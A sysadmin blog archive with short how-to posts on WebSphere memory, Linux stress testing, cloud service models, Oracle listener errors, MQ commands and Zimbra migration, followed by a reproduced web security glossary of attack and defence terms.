October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

Categories

October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

WebSphere JVM memory

the WAS started to load very slow and keep hanging for whatever actions selected, end with a “java.lang.OutOfMemoryError” error message in the WebSphere’s log file.

The default WebSphere’s Java Virtual Machine memory is not enough; you should adjust more memory to your WebSphere Application Server. See following guide to increase WebSphere’s JVM memory.

1. In WebSphere web console, select Servers -> Server Types -> WebSphere application servers -> Server Infrastructure -> Java and Process Management -> Process definition.
WAS-adjust-memory-1

In Additional Properties section, select Java Virtual Machine

WAS-adjust-memory-2

In General Properties section, put 256 for “Initial heap size” and 1024 for “Maximum heap size”.

WAS-adjust-memory-3

Done, restart WebSphere.

January 9th, 2014 | Category: Websphere | Leave a comment

LOAD THE CPU AND MEMORY ON Linux

tar zxvf stress-1.0.4.tar.gz

cd stress-1.0.4

./configure
make && make install

stress -m 512M

To start stress run stress followed by the -c flag for load stress, -m for memory stress, -i for io and -d for HDD. For example to stress cpu execute

TO LOAD THE CPU AND MEMORY ON Linux

stress –cpu 4 -m 20G –vm 2 –vm-bytes 10G

January 8th, 2014 | Category: Linux Commands | Leave a comment

Cloud Service Model

IaaS, PaaS and SaaS are cloud computing service models.

IaaS(Infrastructure as a service), as the name suggests, provides you the computing infrastructure, physical or (quite often) virtual machines and other resources like virtual-machine disk image library, block and file-based storage, firewalls, load balancers, IP addresses, virtual local area networks etc. Examples : Amazon EC2, Windows Azure, Rackspace.

PaaS(Platform as a service), as the name suggests, provides you computing platforms which typically includes operating system, programming language execution environment, database, web server etc. Examples : AWS Elastic Beanstalk, Heroku, Force.com, Google App Engine.

While in Saas(Software as a service) model you are provided with access to application softwares often referred to as on-demand softwares. You don’t have to worry about the installation, setup and running of the application. Service provider will do that for you. You just have to pay and use it through some client. Examples : Google Apps, Microsoft Office 365.

Few additional points regarding your question :

1- AWS(Amazon web services) is a complete suite which involves a whole bunch of useful web services. Most popular are EC2 and S3 and they belong to IaaS service model.

2- Although Hadoop is based on previous works by Google(GFS and MapReduce), it is not from Google. It is an Apache project. You can find more here. It is just a distributed computing platform and does not fall into any of these service models, IMHO.

3- Microsoft’s Windows Azure is again an example of IaaS.

As far as popularity of these services is concerned, they all are popular. It’s just that which one fits into your requirements better. For example, if you want to have a Hadoop cluster on which you would run MapReduce jobs, you will find EC2 a perfect fit, which is IaaS. On the other hand if you have some application, written in some language, and you want to deploy it over the cloud, you would choose something like Heroku, which is an example of PaaS.

IAAS (Infrastructure As A Service) :

•The base layer

•Deals with Virtual Machines, Storage (Hard Disks), Servers, Network, Load Balancers etc

PAAS (Platform As A Service) :

•A layer on top of IAAS

•Runtimes (like java runtimes), Databases (like mySql, Oracle), Web Servers (tomcat etc)

SAAS (Software As A Service) :

•A layer on top on PAAS

•Applications like email (Gmail, Yahoo mail etc), Social Networking sites (Facebook etc)

To quickly relate consider the below Google’s offerings:

IAAS : Google Compute Engine (One can develop programs to be run on high performing google’s computing infrastructure)

PAAS : Google App Engine (One can develop applications and let them execute on top of Google app engine which take care of the execution)

SAAS : Gmail, Google+ etc (One can use email services and extend email/google+ based applications to form newer applications)

Popularity

Company Wise Popularity

Cloud computing is dominated by
1.Amazon Web Services (AWS),
2.Google Compute Engine, Google App Engine
3.Microsoft Azure
4.There are many small and medium scale cloud operators that include IBM, Oracle etc.

Most of the popularity around these services owe to the reputation of the company and the amount of investments being made by these companies around the cloud space.

Type of Service Wise Popularity
1.PAAS (Platform as a Service) is more popular among developers as they can put all their concentration on developing their apps and leave the rest of management and execution to the service provider. Many service providers also offer the flexibility to increase/decrease the CPU power depending upon the traffic loads giving developers cost effective and easy & effortless management.
2.SAAS (Software as a service) is more popular among with consumers, who bother about using the application such as email, social networking etc
3.IAAS (Infrastructure as a service) is more popular among users into research and high computing areas.

I found a great explanation from the “Windows Azure Platform: Cloud Development Jump Start” series in the first video (the video series is available both on iTunes and Zune and it covers the latest 1.3.x version of the SDK). The series is provided free of charge. Below are a couple of slides from the presentation:

Easy to Understand one-word descriptions of each term (i.e. IaaS means host)

image

image 2

I really like the last slide, because it clearly breaks down hierarchy of software layers into what is each vendor service (IaaS, PaaS and SaaS) is responsible for and what you are responsible for. Also in the video one of the speakers (Manu Cohen-Yashar) breaks each service down by the “unit you are gaining” from the service:
IaaS – the unit you are gaining is a computer/server. Therefore IaaS is essentially a “physical server box”. An example of this would be going to RackSpace or SoftLayer and leasing a physical box from them. The vendor manages the networking, hard drives (if they fail), hardware of the box, virtualization O/S (if the box is virtualized). You can remote desktop to the box and you manage everything else (shown in the screenshot above). Windows Azure provides IaaS in the form the VM Role (you upload a Windows Server 2008 R2 image and manage the server yourself).
PaaS – the unit you are gaining is an application/framework. Therefore PaaS is a “hosted application/framework/tools that you can leverage to build something on. That application is configured on IIS/SQL Server etc and runs on a hardware/virtual system that the vendor manages. An example of PaaS would be Windows Azure (excluding the VM Role) services like web role, worker role, Reporting Services etc.
SaaS – the unit you are gaining is business functionality. For example, Gmail is a type of a SaaS mail provider because you don’t have to manage any service yourself and its all done by the vendor (Google in this example).
I really like the clear examples and distinct definitions that are made in the videos. Hopefully, you can use these examples in explaining this to your boss or a non-technical person. I highly recommend you check out the “Windows Azure Platform: Cloud Development Jump Start” series if you are interested on learning about Azure or gain general information on the cloud.

 

 

I am a strong believer of Cloud Computing. It is the trend of the IT industry, no matter hardware vendors or software vendors will eventually step in this filed or die. Actually, it is happening now. In the future, Cloud Computing will be just like the water, electricity and cable those daily things that we pay for monthly to get the services. And we can also easily move to another Cloud service provider that can provide better price and services. Currently, Saas, PaaS and Iaas are the three main categories of Cloud Computing Service Model in the market.

SaaS

Software as a Service (SaaS) is a software distribution model in which applications are hosted by a vendor or service provider and made available to customers over a network, typically the Internet.

SaaS is becoming an increasingly prevalent delivery model as underlying technologies that support Web services and service-oriented architecture (SOA) mature and new developmental approaches, such as Ajax, become popular. Meanwhile, broadband service has become increasingly available to support user access from more areas around the world.

SaaS is closely related to the ASP (application service provider) and on demand computing software delivery models. IDC identifies two slightly different delivery models for SaaS. The hosted application management (hosted AM) model is similar to ASP: a provider hosts commercially available software for customers and delivers it over the Web. In the software on demand model, the provider gives customers network-based access to a single copy of an application created specifically for SaaS distribution.

PaaS

Platform as a Service (PaaS) is a way to rent hardware, operating systems, storage and network capacity over the Internet. The service delivery model allows the customer to rent virtualized servers and associated services for running existing applications or developing and testing new ones.

Platform as a Service (PaaS) is an outgrowth of Software as a Service (SaaS), a software distribution model in which hosted software applications are made available to customers over the Internet. PaaS has several advantages for developers. With PaaS, operating system features can be changed and upgraded frequently. Geographically distributed development teams can work together on software development projects. Services can be obtained from diverse sources that cross international boundaries. Initial and ongoing costs can be reduced by the use of infrastructure services from a single vendor rather than maintaining multiple hardware facilities that often perform duplicate functions or suffer from incompatibility problems. Overall expenses can also be minimized by unification of programming development efforts.

On the downside, PaaS involves some risk of “lock-in” if offerings require proprietary service interfaces or development languages. Another potential pitfall is that the flexibility of offerings may not meet the needs of some users whose requirements rapidly evolve.

IaaS

Infrastructure as a Service (IaaS) is a provision model in which an organization outsources the equipment used to support operations, including storage, hardware, servers and networking components. The service provider owns the equipment and is responsible for housing, running and maintaining it. The client typically pays on a per-use basis. nfrastructure as a Service is sometimes referred to as Hardware as a Service (HaaS)

Some segments within the three major Cloud services.

IDaaS

Identity as a Service (IDaaS) is an authentication infrastructure that is built, hosted and managed by a third-party service provider. IDaaS can be thought of as single sign-on (SSO) for the cloud.

An IDaaS for the enterprise is typically purchased as a subscription-based managed service.  A cloud service provider may also host applications for a fee and provide subscribers with role-based access to specific applications or even entire virtualized desktops through a secure portal.

SaaS

Storage as a Service (SaaS) is a business model in which a large company rents space in their storage infrastructure to a smaller company or individual.

In the enterprise, SaaS vendors are targeting secondary storage applications by promoting SaaS as a convenient way to manage backups. The key advantage to SaaS in the enterprise is in cost savings — in personnel, in hardware and in physical storage space. For instance, instead of maintaining a large tape library and arranging to vault (store) tapes offsite, a network administrator that used SaaS for backups could specify what data on the network should be backed up and how often it should be backed up. His company would sign a service level agreement (SLA) whereby the SaaS provider agreed to rent storage space on a cost-per-gigabyte-stored and cost-per-data-transfer basis and the company’s data would be automatically transferred at the specified time over the storage provider’s proprietary wide area network (WAN) or the Internet. If the company’s data ever became corrupt or got lost, the network administrator could contact the SaaS provider and request a copy of the data.

Storage as a Service is generally seen as a good alternative for a small or mid-sized business that lacks the capital budget and/or technical personnel to implement and maintain their own storage infrastructure. SaaS is also being promoted as a way for all businesses to mitigate risks in disaster recovery, provide long-term retention for records and enhance both business continuity and availability.

CaaS

Communications as a Service (CaaS) is an outsourced enterprise communications solution that can be leased from a single vendor. Such communications can include voice over IP (VoIP or Internet telephony), instant messaging (IM), collaboration and videoconference applications using fixed and mobile devices. CaaS has evolved along the same lines as Software as a Service (SaaS).

The CaaS vendor is responsible for all hardware and software management and offers guaranteed Quality of Service (QoS). CaaS allows businesses to selectively deploy communications devices and modes on a pay-as-you-go, as-needed basis. This approach eliminates the large capital investment and ongoing overhead for a system whose capacity may often exceed or fall short of current demand.

CaaS offers flexibility and expandability that small and medium-sized business might not otherwise afford, allowing for the addition of devices, modes or coverage on demand. The network capacity and feature set can be changed from day to day if necessary so that functionality keeps pace with demand and resources are not wasted. There is no risk of the system becoming obsolete and requiring periodic major upgrades or replacement.

SaaS

Security-as-a-service (SaaS) is an outsourcing model for security management. Typically, Security as a Service involves applications such as anti-virus software delivered over the Internet but the term can also refer to security management provided in-house by an external organization. Security as a Service product vendors include Cisco, McAfee, Panda Software, Symantec, Trend Micro and VeriSign

January 1st, 2014 | Category: cloud | Leave a comment

TNS-12541 TNS-12560 TNS-00511 Linux Error: 111

[oracle@localhost ~]$ lsnrctl

LSNRCTL for Linux: Version 10.2.0.1.0 – Production on 18-JAN-2012 22:45:15

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Welcome to LSNRCTL, type “help” for information.

LSNRCTL> reload
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused
LSNRCTL> service
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused

This problem is related with IP address. To solve, just follow the following simple steps:-

[oracle@localhost ~]$ su – root
Password:
[root@localhost ~]# vi /etc/hosts (copy & paste the below line)

127.0.0.1 localhost.localdomain localhost

[root@localhost ~]# su – oracle
[oracle@localhost ~]$ lsnrctl start

LSNRCTL for Linux: Version 10.2.0.1.0 – Production on 18-JAN-2012 22:51:23

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Starting /u01/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait…

TNSLSNR for Linux: Version 10.2.0.1.0 – Production
System parameter file is /u01/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost.localdomain)(PORT=1521)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
STATUS of the LISTENER
————————
Alias LISTENER
Version TNSLSNR for Linux: Version 10.2.0.1.0 – Production
Start Date 18-JAN-2012 22:51:24
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File /u01/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary…
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost.localdomain)(PORT=1521)))
Services Summary…
Service “PLSExtProc” has 1 instance(s).
Instance “PLSExtProc”, status UNKNOWN, has 1 handler(s) for this service…
Service “orcl” has 1 instance(s).
Instance “orcl”, status UNKNOWN, has 1 handler(s) for this service…
The command completed successfully

[oracle@localhost ~]$

HOW TO UNISTALL ORACLE COMPLETELY FROM LINUX REDHAT OR CENTOS.
Simply run the following commands:

[root@localhost ~]# rm -f /etc/oraInst.loc

[root@localhost ~]# rm -f /etc/oratab

[root@localhost ~]# rm -R -f /etc/oracle

December 30th, 2013 | Category: Oracle | Leave a comment

MQ admin Commands

MQ administration Commands

dspmqver :- to display MQ series version
dspmq :- to view all queue managers of MQ series.
crtmqm :- to create a queue manager
strmqm :- to start queue manager
runmqsc :- to enter in to particular queue manager
endmqm :- to end a queue manager
dltmqm :- to delete a queue manager
dspmqcsv :- to display command server
endmqcsv :- to end command server
strmqcsv :- to start command server
runmqlsr :- to run listener service
endmqlsr :- to end listener service
runmqchl :- to run a channel out of queue manager
runmqdlq :- to execute dead letter handle with the help of rule table
setmqaut :- to set authorizations for particular objects like queuemanager,queue’s channels, listeners to user or group
dspmqaut :- to display authorization for particular user
dmpmqaut :- to dump authorization for particular user
runmqchi :- to run a channel initiator for particular queue manager
runmqtrm :- to run trigger monitor on initiation queue for particular queue manager
rcdmqimg :- to take objects (or) record image of a particular queue manager objects
rcrmqobj :- to recreate the mq objects which are already recorded

Useful syntax of RUNMQSC utility for hadling QueueManager

DEFINE :- To define/create MQ manager objects like queue, Channels, process, and listener.
ALTER :- to update or modify the existing objects
DISPLAY :- to view all the properties of a particular object or to Display all objects
DELETE :- to delete created objects
CLEAR :- to clear the message from the queue
END :- to come out of the queue manager
PING :- to check whether other side channel / queue manager is ready to accept our request.
START :- to start the particular channel or listener
STOP :- to stop particular channel or listener
REFRESH :- used to refresh the security every time after giving or executing, set mgr or command for queue manager or object
RESET :- used to reset channel,cluster,queue manager
RESOLVE :- to resolve the channel which is in indoubt state
SUSPEND :- to suspend a queue manager from a cluster environment
RESUME :- to remove a queue manager from a cluster environment

December 30th, 2013 | Category: MQ Server | Leave a comment

How to Migrate Zimbra mail server from one machine to Another New Machine

A ) Zimbra Old server

1 ) As root user

root@root:~#su zimbra

2 ) Now stop the zimbra services

zimbra@zimbra:~$ zmcontrol stop

Now on the New Server which having same os configuration and installed zimbra mail application on it.

B ) Zimbra New server
1 ) As root user : [ use sudo -i ]

[ make sure you have installed same version of zimbra with same configuration like domain name etc. ]

We now perform the first copy of the zimbra directory between the old mail server and new mail server . On the New server we must stop Zimbra. Stop zimbra on old machine or We leave Zimbra running on the live server for now to reduce downtime.

The following rsync command is run on the New Mail server. Substitute the hostname or IP address of the Old server as required in the command below.

a ) On New mail server [ Rsync between old to new server ]

service zimbra stop

or

zimbra@zimbra:~$zmcontrol stop

rsync -aHz –force –delete live_server:/opt/zimbra/ /opt/zimbra/

eg : rsync -aHz –force –delete root@192.168.28.6:/opt/zimbra/ /opt/zimbra/
[ where ip 192.168.28.6 is our old mail server ]

b ) now execute the below command after rsync done.

chown -R zimbra:zimbra /opt/zimbra
/opt/zimbra/libexec/zmfixperms

Now reboot the machine.

root@root:~# reboot

c ) Start Zimbra. Everything should work

December 26th, 2013 | Category: ZIMBRA | Leave a comment

The Web Security Glossary

Description
The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to clarify the language used within the community.
Complete Document
[PDF] size: 140 kilobytes

Project leader: Robert Auger (contact @ webappsec org)

Abuse of Functionality: An attack technique that uses the features and functionality of a web site to consume, defraud, or circumvent the site’s access controls. See also “Denial of Service”.

ActiveX controls: A program, called a “control”, developed using ActiveX controls technologies. ActiveX controls controls can be downloaded and executed within technology-enabled Web browsers. ActiveX controls is a set of rules for how applications should share information. ActiveX controls controls can be developed in C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web Browser”.

AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser based technology allows a website to perform additional resource requests without refreshing the user page by utilizing the XMLHttpRequest Javascript object.

Anti-Automation: Security measure that prevents automated programs from exercising web site functionality by administering the Turing Test to a user, which only a human could pass. See also “Visual Verification”.

Application Server: A software server, normally using HTTP, which has the ability to execute dynamic web applications. Also known a middleware, this piece of software is normally installed on or near the web server where it can be called upon. See also “Web Application”, “Web Server”.

Attack: A well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation

Authentication: The process of verifying the identity or location of a user, service or application. Authentication is performed using at least one of three mechanisms: “something you have”, “something you know” or “something you are”. The authenticating application may provide different services based on the location, access method, time of day, etc. See also “Insufficient Authentication”.

Authorization: The determination of what resources a user, service or application has permission to access. Accessible resources can be URL’s, files, directories, servlets, databases, execution paths, etc. See also “Insufficient Authorization”.

Backup File Disclosure: (Obsolete) See “Predictable File Location”.

Basic Authentication: A simple form of client-side authentication supported in HTTP. The http-client sends a request header to the web server containing a Base64 encoded username and password. If the username/password combination is valid, the web server grants the client access to the requested resource. See also “Authentication”, “Insufficient Authentication”.

Brute Force: An automated process of trial and error used to guess the “secret” protecting a system. Examples of these secrets include usernames, passwords or cryptographic keys. See also “Authentication”, “Insufficient Authentication”, “Password Recover System”, “Weak Password Recovery Validation”.

Buffer Overflow: An exploitation technique that alters the flow of an application by overwriting parts of memory. Buffer Overflows are a common cause of malfunctioning software. If the data written into a buffer exceeds its size, adjacent memory space will be corrupted and normally produce a fault. An attacker may be able to utilize a buffer overflow situation to alter an application’s process flow. Overfilling the buffer and rewriting memory-stack pointers could be used to execute arbitrary operating-system commands.

CGI Scanner: Automated security program that searches for well-known vulnerabilities in web servers and off-the-shelf web application software. Often CGI Scanners are not very “stateful” in their analysis and only test a series HTTP requests against known CGI strings. See also, “Web Application Vulnerability Scanner.”

CGI Security: (Obsolete) See “Web Application Security”.

Client-Side Scripting: Web browser feature that extends the functionality and interactivity of static HyperText markup language (HTML) web pages. Examples of Client-Side Scripting languages are JavaScript, JScript and VBScript. See also “ActiveX controls”, “Java Applets”.

Common Gateway Interface: (Acronym – CGI) Programming standard for software to interface and execute applications residing on web servers. See also “Web Application”, “Application Server”, “Web Server”.

Configuration File Disclosure: (Obsolete) See “Predictable File Location”.

Content Spoofing: An attack technique used to trick a user into thinking that fake web site content is legitimate data.

Cookie: Small amount of data sent by the web server, to a web client, which can be stored and retrieved at a later time. Typically cookies are used to keep track of a user’s state as they traverse a web site. See also “Cookie Manipulation”.

Cookie Manipulation: Altering or modification of cookie values, on the client’s web browser, to exploit security issues within a web application. Attackers will normally manipulate cookie values to fraudulently authenticate themselves to a web site. This is an example of the problem of trusting the user to provide reasonable input. See also “Cookie”.

Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). See also “Client-Side Scripting”.

Debug Commands: Application debugging features or commands that assist in identifying programming errors during the software development process.

Denial of Service: (Acronym – DoS) An attack technique that consumes all of a web site’s available resources with the intent of rendering legitimate use impossible. Resources include CPU time, memory utilization, bandwidth, disk space, etc. When any of these resources reach full capacity, the system will normally be inaccessible to normal user activity. See also “Abuse of Functionality”.

Directory Browsing: (Obsolete) See “Directory Indexing”.

Directory Enumeration: (Obsolete) See “Predictable File Location”.

Directory Indexing: A feature common to most popular web servers, that exposes contents of a directory when no index page is present. See also “Predictable File Location”.

Directory Traversal: A technique used to exploit web sites by accessing files and commands beyond the document root directory. Most web sites restrict user access to a specific portion of the file-system, typically called the document root directory or CGI root directory. These directories contain the files and executables intended for public use. In most cases, a user should not be able to access any files beyond this point.

DOM Based Cross Site Scrpiting: DOM based cross-site scripting (or “DOM based XSS” in short) is a “cross-site scripting” attack that makes use of insecure Javascript (or in general – client side) programming that takes place in response pages, to effectively incur an XSS condition. In DOM based XSS, the attacker affects the Javascript execution in a target page (in the attacked domain) by providing it with data in the URL or the Referer, which the script insecurely uses. The script may apply the eval() function to the malicious data, or embed it in the DOM (thus making the browser potentially render it as Javascript and run it). This is in contrast to “standard” XSS, where the malicious data is embedded to the page at the server side. In some cases, DOM based XSS can even be conducted in such way that the malicious payload doesn’t even reach the server, which makes this attack more unobtrusive.

Encoding Attacks: An exploitation technique that aids an attack by changing the format of user-supplied data to bypass sanity checking filters. See also “Null Injection”.

Extension Manipulation: (Obsolete) See “Filename Manipulation”.

File Enumeration: (Obsolete) See “Predictable File Location”.

Filename Manipulation: An attack technique used to exploit web sites by manipulating URL filenames to cause application errors, discover hidden content, or display the source code of an application. See also “Predictable File Location”.

Filter-Bypass Manipulation: See “Encoding Attacks”.

Forced Browsing: See “Predictable File Location”.

Form Field Manipulation: Altering or modification of HTML Form-Field input values or HTTP post-data to exploit security issues within a web application. See also “Parameter Tampering”, “Cookie Manipulation”.

Format String Attack: An exploit technique that alters the flow of an application by using string formatting library features to access other memory space.

Frame Spoofing: (Obsolete) See “Content Spoofing”.

HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the World Wide Web. HTTP describes the way a web-client requests data and how a web server responds to those requests. See also “Web Server”, “Web Browser”.

HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache server, proxy server, web application firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks ? “web cache poisoning”, “session hijacking”, “cross-site scripting” as well as the ability to bypass web application firewall protection. The attacker sends multiple specially-crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a web server, or a firewall and a web server) to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it.

HTTP Response Smuggling: HTTP response smuggling is an enhancement of the basic “HTTP response splitting” technique, which can evade anti- HTTP response splitting measures. HTTP response smuggling makes use of “HTTP request smuggling”-like techniques to exploit the discrepancies between what an anti- HTTP Response Splitting mechanism would consider to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti- HTTP response splitting mechanism may consider a particular response stream harmless (single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP response splitting technique. For example, some anti- HTTP response splitting mechanisms in use by some application engines forbid the application from inserting a header containing CR+LF to the response. Yet an attacker can force the application to insert a header containing CRs, thereby circumventing the defense mechanism. Some proxy servers may still treat CR (only) as a header (and response) separator, and as such the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy’s cache.

HTTP Response Splitting: An HTTP response splitting attack causes the web server to send out two HTTP responses, where it typically only sends out one HTTP response (hence the name – “response splitting”). This can be described as HTTP response injection, and is typically conducted by injecting malicious data into an HTTP response header, and using CR+LF characters to shape and terminate the first response, and then completely shape and control the additional response. Having this second, “unexpected” response enables the attacker to fool a client that receives this extra response by forcing this client to first emit a second request. The client then matches the second, attacker-controlled response to the second, attacker-controlled request. The net result (looking at the second request-response pair) is that the client is forced to send an arbitrary request to the vulnerable server, and in response, the client receives an arbitrary response crafted by the attacker. This condition enables “cross-site scripting” and “cache poisoning”.

Impact: Consequences for an organization or environment when an attack is realized, or weakness is present.

Information Leakage: When a web site reveals sensitive data, such as developer comments or error messages, which aids an attacker in exploiting the system. See also “Verbose Messages”.

Insufficient Authentication: When a web site permits an attacker to access sensitive content or functionality without verifying their identity. See also “Authentication”.

Insufficient Authorization: When a web site permits an attacker to access sensitive content or functionality that should require increased access control restrictions. See also “Authorization”.

Insufficient Session Expiration: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session Replay”, “Session Credential”, “Session ID”, “Session Manipulation”.

Insufficient Process Validation: When a web site permits an attacker to bypass or circumvent the intended flow control of an application.

Java: A popular programming language developed by Sun Microsystems(tm). See also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.

Java Applets: An applet is a program written in the Java programming language that can be included in a web page. When a Java enabled web browser views a page containing an applet, the code is executed by the Java Virtual Machine (JVM). See also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.

JavaScript: A popular web browser client-side scripting language used to create dynamic web page content. See also “Active X”, “Java Applets”, “Client-Side Scripting”.

Known CGI file: See “Predictable File Location”.

Known Directory: See “Predictable File Location”.

LDAP Injection: A technique for exploiting a web site by altering backend LDAP statements through manipulating application input. Similarly to the methodology of SQL Injection. See also “Parameter Tampering”, “Form Field Manipulation”.

Meta-Character Injection: An attack technique used to exploit web sites by sending in meta-characters, which have special meaning to a web application, as data input. Meta-characters are characters that have special meaning to programming languages, operating system commands, individual program procedures, database queries, etc. These special characters can adversely alter the behavior of a web application. See also “Null Injection”, “Parameter Tampering”, “SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.

Null Injection: An exploitation technique used to bypass sanity checking filters by adding URL encoded null-byte characters to user-supplied data. When developers create web applications in a variety of programming languages, these web applications often pass data to underlying lower level C-functions for further processing and functionality. If a user-supplied string contains a null character (\0), the web application may stop processing the string at the point of the null. Null Injection is a form of a meta-character Injection attack. See also “Encoding Attacks”, “Parameter Tampering”, “Meta Character Injection”.

OS Command Injection: See “OS Commanding”.

OS Commanding: An attack technique used to exploit web sites by executing operating-system commands through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.

Page Sequencing: (Obsolete) See “Insufficient Process Validation”.

Parameter Tampering: Altering or modification of the parameter name and value pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource Locator”.

Password Recovery System: An automated process that allows a user to recover or reset his password in the event that it has been lost or forgotten. See also “Weak Password Recovery Validation”.

Predictable File Location: A technique used to access hidden web site content or functionality by making educated guesses, manually or automatically, of the names and locations of files. Predictable file locations may include directories, CGI’s, configuration files, backup files, temporary files, etc.

Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol used to create encrypted tunnels between two network-connected devices. See also “Transport Layer Security”.

Session Credential: A string of data provided by the web server, normally stored within a cookie or URL, which identifies a user and authorizes them to perform various actions. See also “Session ID”.

Session Fixation: An attack technique that forces a user’s session credential or session ID to an explicit value. See also “Session Credential”, “Session ID”.

Session Forging: See “Session Prediction”.

Session Hi-Jacking: The result of a user’s session being compromised by an attacker. The attacker could reuse this stolen session to masquerade as the user. See also “Session Prediction”, “Session Credential”, “Session ID”.

Session ID: A string of data provided by the web server, normally stored within a cookie or URL. A Session ID tracks a user’s session, or perhaps just his current session, as he traverse the web site.

Session Manipulation: An attack technique used to hi-jack another user’s session by altering a session ID or session credential value. See also “Session Prediction”, “Session Hi-Jacking”, “Session Credential”, “Session ID”.

Session Prediction: An attack technique used to create fraudulent session credentials or guess other user’s current session ID’s. If successful, an attacker could reuse this stolen session to masquerade as another user. See also “Session Credential”, “Session ID”, “Session Hi-Jacking”.

Session Replay: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session ID”, “Session Credential”, “Insufficient Session Expiration”.

Session Tampering: See “Session Manipulation”

SQL Injection: An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.

SSI Injection: A server-side exploit technique that allows an attacker to send code into a web application, which will be executed by the web server. See also “Meta-Character Injection”, “Parameter Tampering”, “Form Field Manipulation”.

Transport Layer Security: (Acronym – TLS) The more secure successor to SSL. The TLS protocol provides communications privacy over the Internet. The protocol allows client/server applications to communicate in a way that is designed to prevent eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol, but the two systems are not interoperable. See also “Secure Sockets Layer”.

Universal Resource Locator: (Acronym – URL) A standard way of specifying the location of an object, normally a web page, on the Internet. See also “Parameter Tampering”.

Unvalidated Input: When a web application does not properly sanity-check user-supplied data input.

URL Manipulation: Altering or modification of a web applications parameter name and value pairs. Also known as “Parameter Tampering”.

User-Agent Manipulation: A technique used to bypass web site browser requirement restrictions by altering the value sent within an HTTP User-Agent header. See also “Cookie Manipulation”.

Verbose Messages: Detailed pieces of information revealed by a web site, which could aid an attacker in exploiting the system.

Visual Verification: Visual oriented method of anti-automation that prevents automated programs from exercising web site functionality by determining if there is presence of mind. See also “Anti-Automation”.

Vulnerability: “An occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.” – CWE (http://cwe.mitre.org/documents/glossary/index.html#Vulnerability)

Weakness: “A type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software. This term applies to mistakes regardless of whether they occur in implementation, design, or other phases of the SDLC.” – CWE (http://cwe.mitre.org/documents/glossary/index.html#Weakness)

Weak Password Recovery Validation: When a web site permits an attacker to illegally obtain, change or recover another user’s password. See also “Password Recovery System”.

Web Application: A software application, executed by a web server, which responds to dynamic web page requests over HTTP. See also “Web Server”, “Web Application”, “Web Service”.

Web Application Scanner: See “Web Application Vulnerability Scanner”.

Web Application Security: Science of information security relating to the World Wide Web, HTTP and web application software. Also known as “Web Security”.

Web Application Firewall: An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. See also “Web Application Security”, “Web Server”.

Web Application Vulnerability Scanner: An automated security program that searches for software vulnerabilities within web applications. See also “Web Application Security”.

Web Browser: A program used to display HyperText markup language (HTML) web pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”, “JavaScript”, “Client-Side Scripting”.

